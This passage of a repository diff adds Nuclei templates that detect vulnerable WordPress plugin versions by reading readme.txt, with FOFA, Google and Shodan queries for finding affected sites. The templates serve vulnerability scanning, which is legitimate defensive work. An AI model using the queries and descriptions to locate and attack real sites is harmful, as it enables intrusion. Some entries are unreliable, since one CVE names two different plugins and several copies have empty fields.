for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's ad_tax_image shortcode in all versions up to, and including, 1.0.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f37fb598-72a2-48d3-b2e6-63d6654b1474?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-9425 + metadata: + fofa-query: "wp-content/plugins/advanced-category-and-custom-taxonomy-image/" + google-query: inurl:"/wp-content/plugins/advanced-category-and-custom-taxonomy-image/" + shodan-query: 'vuln:CVE-2024-9425' + tags: cve,wordpress,wp-plugin,advanced-category-and-custom-taxonomy-image,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/advanced-category-and-custom-taxonomy-image/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "advanced-category-and-custom-taxonomy-image" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.9') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9452-31c0646fe6fd4340189c7a11a4726afa.yaml b/poc/cve/CVE-2024-9452-31c0646fe6fd4340189c7a11a4726afa.yaml new file mode 100644 index 0000000000..0bdd8c206b --- /dev/null +++ b/poc/cve/CVE-2024-9452-31c0646fe6fd4340189c7a11a4726afa.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9452-31c0646fe6fd4340189c7a11a4726afa + +info: + name: > + Branding <= 1.0 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File Upload + author: topscoder + severity: low + description: > + The Branding plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8736cf81-3fb8-4c81-a878-7d73a3e68fc2?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-9452 + metadata: + fofa-query: "wp-content/plugins/branding/" + google-query: inurl:"/wp-content/plugins/branding/" + shodan-query: 'vuln:CVE-2024-9452' + tags: cve,wordpress,wp-plugin,branding,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/branding/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "branding" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9575.yaml b/poc/cve/CVE-2024-9575.yaml new file mode 100644 index 0000000000..95abadcb5b --- /dev/null +++ b/poc/cve/CVE-2024-9575.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9575 + +info: + name: > + pretix widget <= 1.0.5 - Authenticated (Contributor+) Local File Inclusion + author: topscoder + severity: low + description: > + The pretix widget plugin for WordPress is vulnerable to Local File Inclusion in versions up to, and including, 1.0.5. This makes it possible for authenticated attackers, with contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/cd106b92-48ee-46f4-b0a3-f595d227a0a1?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-9575 + metadata: + fofa-query: "wp-content/plugins/pretix-widget/" + google-query: inurl:"/wp-content/plugins/pretix-widget/" + shodan-query: 'vuln:CVE-2024-9575' + tags: cve,wordpress,wp-plugin,pretix-widget,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/pretix-widget/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "pretix-widget" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.5') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9674-531fd254227c00a4d5bf989a15584f9f.yaml b/poc/cve/CVE-2024-9674-531fd254227c00a4d5bf989a15584f9f.yaml new file mode 100644 index 0000000000..1303fa5be8 --- /dev/null +++ b/poc/cve/CVE-2024-9674-531fd254227c00a4d5bf989a15584f9f.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9674-531fd254227c00a4d5bf989a15584f9f + +info: + name: > + Debrandify · Remove or Replace WordPress Branding <= 1.1.2 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File Upload + author: topscoder + severity: low + description: > + The Debrandify · Remove or Replace WordPress Branding plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.1.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a2110d13-d6d3-43f8-b1bf-8958d4f39ef5?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-9674 + metadata: + fofa-query: "wp-content/plugins/debrandify/" + google-query: inurl:"/wp-content/plugins/debrandify/" + shodan-query: 'vuln:CVE-2024-9674' + tags: cve,wordpress,wp-plugin,debrandify,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/debrandify/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "debrandify" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9689.yaml b/poc/cve/CVE-2024-9689.yaml new file mode 100644 index 0000000000..55d2a4656a --- /dev/null +++ b/poc/cve/CVE-2024-9689.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9689 + +info: + name: > + Post From Frontend <= 1.0.0 - Cross-Site Request Forgery to Arbitrary Post Deletion + author: topscoder + severity: medium + description: > + The Post From Frontend plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.0. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to delete arbitrary posts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c092629f-177c-4201-9fdd-defe47f85811?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.3 + cve-id: CVE-2024-9689 + metadata: + fofa-query: "wp-content/plugins/post-from-frontend/" + google-query: inurl:"/wp-content/plugins/post-from-frontend/" + shodan-query: 'vuln:CVE-2024-9689' + tags: cve,wordpress,wp-plugin,post-from-frontend,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/post-from-frontend/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "post-from-frontend" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9703-e13e3ba30616df9b1b2959b3e69d88ea.yaml b/poc/cve/CVE-2024-9703-e13e3ba30616df9b1b2959b3e69d88ea.yaml new file mode 100644 index 0000000000..e6927e03ea --- /dev/null +++ b/poc/cve/CVE-2024-9703-e13e3ba30616df9b1b2959b3e69d88ea.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9703-e13e3ba30616df9b1b2959b3e69d88ea + +info: + name: > + Arconix Shortcodes <= 2.1.12 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode + author: topscoder + severity: low + description: > + The Arconix Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'button' shortcode in all versions up to, and including, 2.1.12 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ef395956-477c-4970-becd-4f437e4807a3?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-9703 + metadata: + fofa-query: "wp-content/plugins/arconix-shortcodes/" + google-query: inurl:"/wp-content/plugins/arconix-shortcodes/" + shodan-query: 'vuln:CVE-2024-9703' + tags: cve,wordpress,wp-plugin,arconix-shortcodes,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/arconix-shortcodes/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "arconix-shortcodes" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1.12') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9848-ac1bebcc37e467cdd99a1009c53e8491.yaml b/poc/cve/CVE-2024-9848-ac1bebcc37e467cdd99a1009c53e8491.yaml new file mode 100644 index 0000000000..64786480d5 --- /dev/null +++ b/poc/cve/CVE-2024-9848-ac1bebcc37e467cdd99a1009c53e8491.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9848-ac1bebcc37e467cdd99a1009c53e8491 + +info: + name: > + Product Customizer Light <= 1.0.0 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File Upload + author: topscoder + severity: low + description: > + The Product Customizer Light plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/18d1feee-347c-4f43-a01b-67b3d0a5b2d6?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-9848 + metadata: + fofa-query: "wp-content/plugins/product-customizer-light/" + google-query: inurl:"/wp-content/plugins/product-customizer-light/" + shodan-query: 'vuln:CVE-2024-9848' + tags: cve,wordpress,wp-plugin,product-customizer-light,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/product-customizer-light/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "product-customizer-light" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9861.yaml b/poc/cve/CVE-2024-9861.yaml new file mode 100644 index 0000000000..3912d83949 --- /dev/null +++ b/poc/cve/CVE-2024-9861.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9861 + +info: + name: > + Miniorange OTP Verification with Firebase <= 3.6.0 - Authentication Bypass + author: topscoder + severity: critical + description: > + The Miniorange OTP Verification with Firebase plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 3.6.0. This is due to missing validation on the token being supplied during the otp login through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they know the phone number associated with that user. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/04045ec3-dd8e-4ac5-bd73-eef6205ecc62?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.1 + cve-id: CVE-2024-9861 + metadata: + fofa-query: "wp-content/plugins/miniorange-firebase-sms-otp-verification/" + google-query: inurl:"/wp-content/plugins/miniorange-firebase-sms-otp-verification/" + shodan-query: 'vuln:CVE-2024-9861' + tags: cve,wordpress,wp-plugin,miniorange-firebase-sms-otp-verification,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/miniorange-firebase-sms-otp-verification/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "miniorange-firebase-sms-otp-verification" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.6.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9862.yaml b/poc/cve/CVE-2024-9862.yaml new file mode 100644 index 0000000000..88f8cfb92e --- /dev/null +++ b/poc/cve/CVE-2024-9862.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9862 + +info: + name: > + Miniorange OTP Verification with Firebase <= 3.6.0 - Unauthenticated Arbitrary User Password Change + author: topscoder + severity: critical + description: > + The Miniorange OTP Verification with Firebase plugin for WordPress is vulnerable to Arbitrary User Password Change in versions up to, and including, 3.6.0. This is due to the plugin providing user-controlled access to objects, letting a user bypass authorization and access system resources, and the user current password check is missing. This makes it possible for unauthenticated attackers to change user passwords and potentially take over administrator accounts. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/9c3df12d-e526-4a23-89d3-bfdcea9f7b2d?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-9862 + metadata: + fofa-query: "wp-content/plugins/miniorange-firebase-sms-otp-verification/" + google-query: inurl:"/wp-content/plugins/miniorange-firebase-sms-otp-verification/" + shodan-query: 'vuln:CVE-2024-9862' + tags: cve,wordpress,wp-plugin,miniorange-firebase-sms-otp-verification,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/miniorange-firebase-sms-otp-verification/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "miniorange-firebase-sms-otp-verification" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.6.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9863.yaml b/poc/cve/CVE-2024-9863.yaml new file mode 100644 index 0000000000..5366839601 --- /dev/null +++ b/poc/cve/CVE-2024-9863.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9863 + +info: + name: > + Miniorange OTP Verification with Firebase <= 3.6.0 - Privilege Escalation via Registration due to Administrator Default User Role Value + author: topscoder + severity: critical + description: > + The UserPro plugin for WordPress is vulnerable to privilege escalation in versions up to, and including, 3.6.0 due to the insecure 'administrator' default value for the 'default_user_role' option. This makes it possible for unauthenticated attackers to register an administrator user even if the registration form is disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f04eab14-dd86-4145-b5eb-20d064bc8417?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-9863 + metadata: + fofa-query: "wp-content/plugins/miniorange-firebase-sms-otp-verification/" + google-query: inurl:"/wp-content/plugins/miniorange-firebase-sms-otp-verification/" + shodan-query: 'vuln:CVE-2024-9863' + tags: cve,wordpress,wp-plugin,miniorange-firebase-sms-otp-verification,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/miniorange-firebase-sms-otp-verification/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "miniorange-firebase-sms-otp-verification" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.6.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9892-b4887767d0388ff3fe05ed90d581f15b.yaml b/poc/cve/CVE-2024-9892-b4887767d0388ff3fe05ed90d581f15b.yaml new file mode 100644 index 0000000000..4c840af352 --- /dev/null +++ b/poc/cve/CVE-2024-9892-b4887767d0388ff3fe05ed90d581f15b.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9892-b4887767d0388ff3fe05ed90d581f15b + +info: + name: > + Add Widget After Content <= 2.4.6 - Authenticated (Administrator+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Add Widget After Content plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 2.4.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e02472a8-5b88-43ad-86f3-e890b49899ad?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-9892 + metadata: + fofa-query: "wp-content/plugins/add-widget-after-content/" + google-query: inurl:"/wp-content/plugins/add-widget-after-content/" + shodan-query: 'vuln:CVE-2024-9892' + tags: cve,wordpress,wp-plugin,add-widget-after-content,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/add-widget-after-content/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "add-widget-after-content" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.4.6') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9898.yaml b/poc/cve/CVE-2024-9898.yaml new file mode 100644 index 0000000000..65b5507352 --- /dev/null +++ b/poc/cve/CVE-2024-9898.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9898 + +info: + name: > + Parallax Image <= 1.8 - Authenticated (Contributor+) Stored Cross-Site Scripting via dd-parallax Shortcode + author: topscoder + severity: low + description: > + The Parallax Image plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's dd-parallax shortcode in all versions up to, and including, 1.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/57641366-85d3-4375-8cde-041227c9f811?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-9898 + metadata: + fofa-query: "wp-content/plugins/parallax-image/" + google-query: inurl:"/wp-content/plugins/parallax-image/" + shodan-query: 'vuln:CVE-2024-9898' + tags: cve,wordpress,wp-plugin,parallax-image,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/parallax-image/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "parallax-image" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.8') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9940.yaml b/poc/cve/CVE-2024-9940.yaml new file mode 100644 index 0000000000..bd309b8455 --- /dev/null +++ b/poc/cve/CVE-2024-9940.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9940 + +info: + name: > + Calculated Fields Form <= 5.2.45 - HTML Injection + author: topscoder + severity: medium + description: > + The Calculated Fields Form plugin for WordPress is vulnerable to HTML Injection in all versions up to, and including, 5.2.45. This is due to the plugin not properly neutralizing HTML elements from submitted forms. This makes it possible for unauthenticated attackers to inject arbitrary HTML that will render when the administrator views form submissions in their email. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e2c9f6a5-8698-4452-bf0a-c1d796b2fdad?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.3 + cve-id: CVE-2024-9940 + metadata: + fofa-query: "wp-content/plugins/calculated-fields-form/" + google-query: inurl:"/wp-content/plugins/calculated-fields-form/" + shodan-query: 'vuln:CVE-2024-9940' + tags: cve,wordpress,wp-plugin,calculated-fields-form,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/calculated-fields-form/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "calculated-fields-form" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.2.45') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9951.yaml b/poc/cve/CVE-2024-9951.yaml new file mode 100644 index 0000000000..c1d29ad484 --- /dev/null +++ b/poc/cve/CVE-2024-9951.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9951 + +info: + name: > + Wordpress Photo Album Plus <= 8.8.05.003 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The WP Photo Album Plus plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'wppa-tab' parameter in all versions up to, and including, 8.8.05.003 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3a4f0c06-db88-4950-b1f5-b2aab480c974?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-9951 + metadata: + fofa-query: "wp-content/plugins/wp-photo-album-plus/" + google-query: inurl:"/wp-content/plugins/wp-photo-album-plus/" + shodan-query: 'vuln:CVE-2024-9951' + tags: cve,wordpress,wp-plugin,wp-photo-album-plus,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-photo-album-plus/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-photo-album-plus" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 8.8.05.003') \ No newline at end of file diff --git a/poc/debug/strut-debug-mode.yaml b/poc/debug/strut-debug-mode.yaml new file mode 100644 index 0000000000..ade1eefb66 --- /dev/null +++ b/poc/debug/strut-debug-mode.yaml @@ -0,0 +1,16 @@ +id: struts-debug-mode +info: + name: Apache Struts setup in Debug-Mode + author: pdteam + severity: low + tags: logs,struts,apache,exposure,setup +requests: + - method: GET + path: + - '{{BaseURL}}' + matchers: + - type: word + words: + - "" + - "" + condition: and diff --git a/poc/microsoft/miniorange-firebase-sms-otp-verification.yaml b/poc/microsoft/miniorange-firebase-sms-otp-verification.yaml new file mode 100644 index 0000000000..7c31aadb85 --- /dev/null +++ b/poc/microsoft/miniorange-firebase-sms-otp-verification.yaml @@ -0,0 +1,59 @@ +id: miniorange-firebase-sms-otp-verification + +info: + name: > + Miniorange OTP Verification with Firebase <= 3.6.0 - Authentication Bypass + author: topscoder + severity: critical + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/04045ec3-dd8e-4ac5-bd73-eef6205ecc62?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/miniorange-firebase-sms-otp-verification/" + google-query: inurl:"/wp-content/plugins/miniorange-firebase-sms-otp-verification/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,miniorange-firebase-sms-otp-verification,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/miniorange-firebase-sms-otp-verification/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "miniorange-firebase-sms-otp-verification" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.6.0') \ No newline at end of file diff --git a/poc/other/add-widget-after-content-d85568da3687a3e685b0444c220ceb6e.yaml b/poc/other/add-widget-after-content-d85568da3687a3e685b0444c220ceb6e.yaml new file mode 100644 index 0000000000..17ec589a58 --- /dev/null +++ b/poc/other/add-widget-after-content-d85568da3687a3e685b0444c220ceb6e.yaml @@ -0,0 +1,59 @@ +id: add-widget-after-content-d85568da3687a3e685b0444c220ceb6e + +info: + name: > + Add Widget After Content <= 2.4.6 - Authenticated (Administrator+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e02472a8-5b88-43ad-86f3-e890b49899ad?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/add-widget-after-content/" + google-query: inurl:"/wp-content/plugins/add-widget-after-content/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,add-widget-after-content,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/add-widget-after-content/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "add-widget-after-content" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.4.6') \ No newline at end of file diff --git a/poc/other/advanced-category-and-custom-taxonomy-image-73c3c8752c78aa879dec30ab6cd50af4.yaml b/poc/other/advanced-category-and-custom-taxonomy-image-73c3c8752c78aa879dec30ab6cd50af4.yaml new file mode 100644 index 0000000000..0014040902 --- /dev/null +++ b/poc/other/advanced-category-and-custom-taxonomy-image-73c3c8752c78aa879dec30ab6cd50af4.yaml @@ -0,0 +1,59 @@ +id: advanced-category-and-custom-taxonomy-image-73c3c8752c78aa879dec30ab6cd50af4 + +info: + name: > + Advanced Category and Custom Taxonomy Image <= 1.0.9 - Authenticated (Contributor+) Stored Cross-Site Scripting via ad_tax_image Shortcode + author: topscoder + severity: low + description: > + + 